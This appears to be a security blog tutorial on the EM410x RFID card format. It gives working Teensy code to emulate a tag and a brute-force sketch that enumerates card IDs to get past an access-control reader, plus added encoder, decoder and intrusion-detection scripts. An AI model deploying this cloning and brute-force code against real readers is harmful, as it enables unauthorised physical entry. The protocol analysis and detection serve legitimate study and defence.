In the previous post we introduced the Teensy++ 2.0. Here we use the Teensy++ 2.0 to emulate an EM410x tag and run a brute-force test against the access control of an EM410x-based system; the relevant code and explanation follow.
What is low frequency? What is EM410x?
First, a few words about the low-frequency cards that work at 125 kHz (for example the EM410x), so that the rest of the article is easier to follow.
What is low frequency? Here is an explanation:
Low frequency (LF) refers to radio waves from 30 kHz to 300 kHz. Some radio frequency identification (RFID) tags use this band; such tags are generally called LFIDs or LowFIDs (Low Frequency IDentification).
The frequencies that LFID/LowFID tags commonly (but not exclusively) use are 125 kHz and 134 kHz. These are only the carrier frequencies of low-frequency RFID; the frequency itself has no function of its own, that is, it does not provide ID recognition, reading, writing and so on. Common low-frequency cards include the HID, T55xx and EM4x series, which we meet every day. This article covers the EM410x series used for access-control ID recognition at 125 kHz.
The following is the EM410x format:
1 1 1 1 1 1 1 1 1            9-bit header
D00 D01 D02 D03 P0   \  8-bit version or vendor ID
D10 D11 D12 D13 P1   /
D20 D21 D22 D23 P2   \
D30 D31 D32 D33 P3   |
D40 D41 D42 D43 P4   |
D50 D51 D52 D53 P5   |  32-bit data
D60 D61 D62 D63 P6   |
D70 D71 D72 D73 P7   |
D80 D81 D82 D83 P8   |
D90 D91 D92 D93 P9   /
PC0 PC1 PC2 PC3 S0      4 column parity bits + stop bit
P0-P9: 10 row parity bits (one per row)
The frame is 64 bits long and starts with nine consecutive 1s. D00-D93 is the user data, P0-P9 are the row even-parity bits, PC0-PC3 are the column even-parity bits, and S0 is the stop bit.
What is even parity? A parity bit records whether the number of 1s in the data is odd or even.
For example, 0x01 is 0001 in binary, which contains an odd number of 1s; with even parity the value becomes 00011, so that the total number of 1s is even. If the data is 1110, the even-parity form is 11101, whereas the odd-parity form is 11100.
The following example shows the EM410x format in practice:
Suppose I have an EM410x card; the ID printed on the card is:
0005206306
If you read it with a Proxmark3 or another low-frequency reader, you will see two extra hex digits in front of the ID; this is the 8-bit version, vendor or user ID. Read with a Proxmark3, the ID is:
0x0600503472
Here 0x00503472 corresponds to 5206306 and 0x06 is the identifier. How does this map onto the frame format? See the following analysis:
First, the header:
111111111
Card-number data with row even-parity bits:
0 = 0000 0
6 = 0110 0
0 = 0000 0
0 = 0000 0
5 = 0101 0
0 = 0000 0
3 = 0011 0
4 = 0100 1
7 = 0111 1
2 = 0010 1
PC0-PC3 = 0001 (column even-parity bits)
S0 = 0 (stop bit)
Putting the above together, we get the following 64-bit frame:
111111111 00000 01100 00000 00000 01010 00000 00110 01001 01111 00101 00010
This is the EM410x format. If you have further questions, Google and other search engines will turn up more information. Next we look at how to use the Teensy to emulate an EM410x tag.
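As an added example (this code is mine, not the article's sketch), here is the same framing done in Python: an encoder that produces the 64-bit frame from the version byte and the ID, a decoder that checks all ten row parities, the four column parities and the stop bit, and a sync routine that finds valid frames in a continuous bitstream, since a tag repeats the frame back to back. The function names (em410x_encode, em410x_decode, find_frames) are mine; the values used are the 0x06 / 0x00503472 frame worked out above.

```python
"""EM410x frame encoder/decoder with row and column even parity
(added example, not the article's code)."""

# Nine consecutive 1s. A nibble of four 1s is always followed by parity 0, so a run of
# 1s inside the body is at most 8 long and the header cannot be confused with data.
HEADER = "1" * 9


def even_parity(bits):
    """Even parity: the parity bit makes the total number of 1s even."""
    return "1" if bits.count("1") % 2 else "0"


def em410x_encode(version, card_id):
    """Build the 64-bit frame for an 8-bit version/vendor byte and a 32-bit ID."""
    if not (0 <= version <= 0xFF and 0 <= card_id <= 0xFFFFFFFF):
        raise ValueError("version must fit in 8 bits and card_id in 32 bits")
    data = (version << 32) | card_id                        # 40 data bits = 10 nibbles
    rows = [f"{(data >> (4 * (9 - i))) & 0xF:04b}" for i in range(10)]
    frame = HEADER
    for row in rows:
        frame += row + even_parity(row)                     # Dx0..Dx3 + Px
    for c in range(4):                                      # PC0..PC3, one per bit column
        frame += even_parity("".join(r[c] for r in rows))
    frame += "0"                                            # S0 stop bit
    return frame


def em410x_decode(frame):
    """Validate header, 10 row parities, 4 column parities and the stop bit;
    return (version, card_id) or raise ValueError."""
    if len(frame) != 64 or not frame.startswith(HEADER):
        raise ValueError("wrong length or missing 9-bit header")
    rows = []
    for i in range(10):
        row, p = frame[9 + 5 * i:13 + 5 * i], frame[13 + 5 * i]
        if p != even_parity(row):
            raise ValueError(f"row parity error in nibble {i}")
        rows.append(row)
    for c in range(4):
        if frame[59 + c] != even_parity("".join(r[c] for r in rows)):
            raise ValueError(f"column parity error in bit column {c}")
    if frame[63] != "0":
        raise ValueError("stop bit is not 0")
    data = int("".join(rows), 2)
    return data >> 32, data & 0xFFFFFFFF


def find_frames(stream):
    """Sync on the header in a continuous bitstream and return every frame that
    passes all parity checks; a false sync point fails parity and is skipped."""
    found = []
    i = 0
    while i + 64 <= len(stream):
        if stream.startswith(HEADER, i):
            try:
                found.append(em410x_decode(stream[i:i + 64]))
                i += 64
                continue
            except ValueError:
                pass
        i += 1
    return found


if __name__ == "__main__":
    frame = em410x_encode(0x06, 0x00503472)
    print(" ".join([frame[:9]] + [frame[i:i + 5] for i in range(9, 64, 5)]))
    print("decoded: version=0x%02X id=0x%08X" % em410x_decode(frame))
```

The parity checks are what a reader relies on to reject a corrupted or mis-synchronised read: a single flipped data bit fails its row parity, and a one-bit shift of the sync point already fails parity in the first row, which is why find_frames falls back to scanning bit by bit.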
Using the Teensy to emulate an EM410x tag
Hardware component list:
1. 125 kHz low-frequency coil (antenna)
2. Capacitor
3. Transistor 2N3904
4. Resistor: 10 kΩ
5. Teensy++ 2.0
To build a 125 kHz resonant circuit we need the LC resonance formula:
f = 1 / (2π √(LC))
f: frequency, L: inductance, C: capacitance
If the coil you bought has an inductance of 345 µH, pair it with a capacitor of the value (in pF) the formula gives; the same applies to a 730 µH coil. Once the antenna is set up, load the following code onto the Teensy++ 2.0; an Arduino development board also works.
The code used to emulate an EM410x tag on the Teensy++ 2.0 is as follows:
String sStart = "1111111110000000000";   // 9-bit header + version byte 0x00 as two nibbles with row parity
String sStop  = "0";                     // S0 stop bit
int data_to_spoof[64];
int coil_pin = 9;
int a, b, c, d;                          // column parity counters for bit 3 .. bit 0
unsigned long id;
char HexCode[9];                         // 8 hex digits + terminating NUL

void setup() {
  // Serial.begin(9600);
  pinMode(coil_pin, OUTPUT);
  digitalWrite(coil_pin, LOW);
  id = 0x503472;
  a = b = c = d = 0;
  sprintf(HexCode, "%08lX", id);         // "00503472": the 32-bit ID as 8 hex nibbles, most significant first
  String s = sStart;
  for (int i = 0; i < 8; i++) {
    s += Em4xCode(HexCode[i]);           // 4 data bits + row parity per nibble
  }
  s += EvenParity(a) + EvenParity(b) + EvenParity(c) + EvenParity(d) + sStop;
  // Serial.println(s);
  toCode(s);
}

// Drive the coil for one Manchester half-bit: first half carries the bit, second half its complement
void set_pin_manchester(int clock_half, int signal) {
  int man_encoded = clock_half ^ signal;
  digitalWrite(coil_pin, man_encoded == 1 ? HIGH : LOW);
}

// One hex nibble -> 4 data bits + even row parity; also tallies the 1s per column for PC0..PC3
String Em4xCode(char code) {
  switch (code) {
    case '1': d++;                     return "00011";
    case '2': c++;                     return "00101";
    case '3': c++; d++;                return "00110";
    case '4': b++;                     return "01001";
    case '5': b++; d++;                return "01010";
    case '6': b++; c++;                return "01100";
    case '7': b++; c++; d++;           return "01111";
    case '8': a++;                     return "10001";
    case '9': a++; d++;                return "10010";
    case 'A': a++; c++;                return "10100";
    case 'B': a++; c++; d++;           return "10111";
    case 'C': a++; b++;                return "11000";
    case 'D': a++; b++; d++;           return "11011";
    case 'E': a++; b++; c++;           return "11101";
    case 'F': a++; b++; c++; d++;      return "11110";
    default:                           return "00000";   // '0'
  }
}

String EvenParity(int Parity) {
  return (Parity % 2 == 1) ? "1" : "0";
}

void toCode(String s) {
  for (int i = 0; i < 64; i++) {
    data_to_spoof[i] = (s[i] == '0') ? 0 : 1;
  }
}

void loop() {
  for (int i = 0; i < 64; i++) {
    set_pin_manchester(0, data_to_spoof[i]);
    delayMicroseconds(256);
    set_pin_manchester(1, data_to_spoof[i]);
    delayMicroseconds(256);
  }
}
You may not immediately see why the data is sent this way: it is because the frame is transmitted as Manchester code, which I will explain here.
For example, to send the 64-bit frame:
111111111 00000 01100 00000 00000 01010 00000 00110 01001 01111 00101 00010
How long does one bit take to transmit? The answer is 64 / 125 kHz = 512 µs, that is, one bit every 512 µs. Manchester code, however, represents each bit with two symbols: a data 1 becomes 10 and a data 0 becomes 01. So when transmitting, each 512 µs bit is converted into two Manchester half-bits of 512 µs / 2 = 256 µs each. The program converts the 64-bit frame into Manchester code as it sends, which is why the interval between level changes is delayMicroseconds(256).
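The following added example (not part of the article's sketch) does the same conversion in Python so the timing can be checked without hardware: it turns the 64-bit frame above into 128 Manchester half-bits using the 1 -> 10, 0 -> 01 convention from the text, derives the 512 µs bit period from 64 carrier cycles at 125 kHz, and decodes the half-bits back, rejecting the 00 and 11 pairs that cannot occur in valid Manchester data. The function names are mine.

```python
"""Manchester coding of the EM410x frame at 125 kHz (added example, not the article's sketch)."""

CARRIER_HZ = 125_000
CYCLES_PER_BIT = 64      # one data bit spans 64 carrier cycles (the rate used in the text)

# The 64-bit frame worked out in the text (header + 0x06 00503472 with parity bits)
FRAME = "".join([
    "111111111", "00000", "01100", "00000", "00000", "01010",
    "00000", "00110", "01001", "01111", "00101", "00010",
])


def bit_period_us(carrier_hz=CARRIER_HZ, cycles_per_bit=CYCLES_PER_BIT):
    """64 cycles / 125 kHz = 512 us per data bit."""
    return cycles_per_bit * 1_000_000 / carrier_hz


def manchester_encode(bits):
    """Data 1 -> '10', data 0 -> '01' (the convention in the text); each chip is half a bit."""
    if set(bits) - {"0", "1"}:
        raise ValueError("bits must be a string of 0/1")
    return "".join("10" if b == "1" else "01" for b in bits)


def manchester_decode(chips):
    """Inverse of manchester_encode. '00' and '11' never occur in valid data, so they
    signal a lost clock edge or a reader that sampled out of phase."""
    if len(chips) % 2:
        raise ValueError("odd number of chips")
    out = []
    for i in range(0, len(chips), 2):
        pair = chips[i:i + 2]
        if pair == "10":
            out.append("1")
        elif pair == "01":
            out.append("0")
        else:
            raise ValueError(f"invalid chip pair {pair!r} at chip {i}")
    return "".join(out)


def coil_schedule(bits):
    """(level, hold_us) steps a coil driver executes: the same thing the sketch does with
    set_pin_manchester() followed by delayMicroseconds(256) for each half-bit."""
    half = bit_period_us() / 2
    return [(int(ch), half) for ch in manchester_encode(bits)]


def frame_duration_us(bits=FRAME):
    """Time to play one whole frame once: 64 bits * 512 us = 32768 us."""
    return len(bits) * bit_period_us()


if __name__ == "__main__":
    chips = manchester_encode(FRAME)
    print(f"{len(FRAME)} bits -> {len(chips)} half-bits, {bit_period_us():.0f} us per bit, "
          f"{frame_duration_us() / 1000:.3f} ms per frame")
    assert manchester_decode(chips) == FRAME
```

The 32.768 ms per frame is also the number that sizes the risk on the reader side: a reader that accepts a new ID as soon as one frame has been heard is accepting roughly thirty candidate IDs per second from a single emulator.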
When we use the Teensy for this emulation, we find that with an exhaustive test we can quickly get past the restrictions of the access control system and enter the restricted area. In the test environment the card reader has no delay between reads, so we can present tag IDs very quickly. But because every access control system has its own settings and environment, we cannot be sure the following exhaustive-search code suits everyone, so this article presents it as a feasible conjecture.
The following is the code of the brute-force test program:
String sStart = "1111111110000000000";   // 9-bit header + version byte 0x00 as two nibbles with row parity
String sStop  = "0";                     // S0 stop bit
int data_to_spoof[64];
int led = 6;
int coil_pin = 9;
int a, b, c, d;                          // column parity counters for bit 3 .. bit 0
unsigned long id;
char HexCode[9];                         // 8 hex digits + terminating NUL

void setup() {
  // Serial.begin(9600);
  pinMode(led, OUTPUT);
  pinMode(coil_pin, OUTPUT);
  digitalWrite(coil_pin, LOW);
  id = 0x502E96;                         // starting ID of the exhaustive search
}

// Drive the coil for one Manchester half-bit: first half carries the bit, second half its complement
void set_pin_manchester(int clock_half, int signal) {
  int man_encoded = clock_half ^ signal;
  digitalWrite(coil_pin, man_encoded == 1 ? HIGH : LOW);
}

// One hex nibble -> 4 data bits + even row parity; also tallies the 1s per column for PC0..PC3
String Em4xCode(char code) {
  switch (code) {
    case '1': d++;                     return "00011";
    case '2': c++;                     return "00101";
    case '3': c++; d++;                return "00110";
    case '4': b++;                     return "01001";
    case '5': b++; d++;                return "01010";
    case '6': b++; c++;                return "01100";
    case '7': b++; c++; d++;           return "01111";
    case '8': a++;                     return "10001";
    case '9': a++; d++;                return "10010";
    case 'A': a++; c++;                return "10100";
    case 'B': a++; c++; d++;           return "10111";
    case 'C': a++; b++;                return "11000";
    case 'D': a++; b++; d++;           return "11011";
    case 'E': a++; b++; c++;           return "11101";
    case 'F': a++; b++; c++; d++;      return "11110";
    default:                           return "00000";   // '0'
  }
}

String EvenParity(int Parity) {
  return (Parity % 2 == 1) ? "1" : "0";
}

void toCode(String s) {
  for (int i = 0; i < 64; i++) {
    data_to_spoof[i] = (s[i] == '0') ? 0 : 1;
  }
}

void loop() {
  a = b = c = d = 0;
  sprintf(HexCode, "%08lX", id);         // current candidate ID as 8 hex nibbles, most significant first
  String s = sStart;
  for (int i = 0; i < 8; i++) {
    s += Em4xCode(HexCode[i]);
  }
  s += EvenParity(a) + EvenParity(b) + EvenParity(c) + EvenParity(d) + sStop;
  // Serial.println(s);
  toCode(s);
  for (int ii = 0; ii < 2; ii++) {       // send each candidate frame twice
    for (int i = 0; i < 64; i++) {
      set_pin_manchester(0, data_to_spoof[i]);
      delayMicroseconds(265);
      set_pin_manchester(1, data_to_spoof[i]);
      delayMicroseconds(265);
    }
  }
  if (id == 0x50308A) {                  // test marker: light the LED when the known test card ID is reached
    digitalWrite(led, HIGH);
  }
  id += 1;                               // unsigned long wraps to 0 by itself after 0xFFFFFFFF
}
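From the defender's side, the property the test above relies on is that the reader accepts one candidate ID after another with no delay, so a brute-force run shows up in the controller's event log as a burst of denied reads with consecutive IDs only tens of milliseconds apart. The following added example (not from the article) runs that detection over a constructed event log; the log format, reader names, IDs and thresholds are my own assumptions, not values from the text.

```python
"""Detect ID enumeration against a badge reader from access-control events
(added example, not from the article; log format and thresholds are assumptions)."""
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample log: one legitimate badge, then a burst of consecutive unknown IDs
# hitting door-3 about 70 ms apart, which no person swiping cards could produce.
SAMPLE_LOG = """\
2024-03-01T08:00:00.000 reader=door-3 id=00503472 result=ALLOW
2024-03-01T08:00:12.100 reader=door-3 id=00502E96 result=DENY
2024-03-01T08:00:12.170 reader=door-3 id=00502E97 result=DENY
2024-03-01T08:00:12.240 reader=door-3 id=00502E98 result=DENY
2024-03-01T08:00:12.310 reader=door-3 id=00502E99 result=DENY
2024-03-01T08:00:12.380 reader=door-3 id=00502E9A result=DENY
2024-03-01T08:00:12.450 reader=door-3 id=00502E9B result=DENY
2024-03-01T08:05:00.000 reader=door-1 id=00111111 result=DENY
2024-03-01T08:05:30.000 reader=door-1 id=00503472 result=ALLOW
"""

WINDOW = timedelta(seconds=10)   # sliding window (illustrative threshold)
MAX_DENIES = 5                   # denied reads per window that trigger an alert (illustrative)


def parse_line(line):
    """'<iso time> reader=<name> id=<hex> result=<ALLOW|DENY>' -> (datetime, reader, id, result)."""
    ts, rest = line.split(" ", 1)
    fields = dict(kv.split("=", 1) for kv in rest.split())
    return datetime.fromisoformat(ts), fields["reader"], int(fields["id"], 16), fields["result"]


def detect_enumeration(log_text):
    """One alert per burst: (reader, time, denies in window, ids consecutive?, shortest gap in ms)."""
    alerts = []
    recent = defaultdict(deque)          # reader -> deque of (timestamp, id) for recent DENY events
    for line in log_text.splitlines():
        ts, reader, card_id, result = parse_line(line)
        if result != "DENY":
            continue
        q = recent[reader]
        q.append((ts, card_id))
        while ts - q[0][0] > WINDOW:     # drop events that fell out of the window
            q.popleft()
        if len(q) == MAX_DENIES:         # fires once, when the burst crosses the threshold
            entries = list(q)
            ids = [cid for _, cid in entries]
            sequential = all(b - a == 1 for a, b in zip(ids, ids[1:]))
            gap_ms = min((b - a) // timedelta(milliseconds=1)
                         for (a, _), (b, _) in zip(entries, entries[1:]))
            alerts.append((reader, ts.isoformat(timespec="milliseconds"), len(q), sequential, gap_ms))
    return alerts


if __name__ == "__main__":
    for alert in detect_enumeration(SAMPLE_LOG):
        print("ALERT reader=%s at %s: %d denies, sequential=%s, min gap %d ms" % alert)
```

A controller that applies the same rule online can disable the reader for a cooldown period once the threshold is crossed, which turns a search that costs milliseconds per candidate into one that costs the cooldown time per batch; the log-side rule is still worth running because it also records the bursts that the reader did not stop.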